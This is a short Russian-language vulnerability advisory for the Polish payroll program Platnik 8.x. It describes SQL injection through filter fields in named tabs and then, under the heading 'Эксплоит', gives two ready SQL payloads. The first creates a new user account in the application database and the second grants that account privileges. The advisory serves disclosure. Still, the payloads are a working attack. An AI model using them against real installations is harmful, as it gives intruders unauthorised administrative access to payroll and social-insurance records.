Программа: Platnik 8.x
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных передаваемых через поле "filter field" во вкладке "Dziennik-Archiwum
dziennika operacji" и через поле фильтра "okres pracy" во вкладке "III-VI" во
вкладке "Documents (ZUS ZSWA)". Удаленный пользователь может с помощью
специально сформированного запроса выполнить произвольные SQL команды в базе
данных приложения.
Эксплоит:
Добавить пользователя:
<'2010-02-28')INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password
hash', '2010-02-28 15:46:48', null, 'A', null)--
Повысить привилегии пользователя:
<'2010-02-28')INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)--
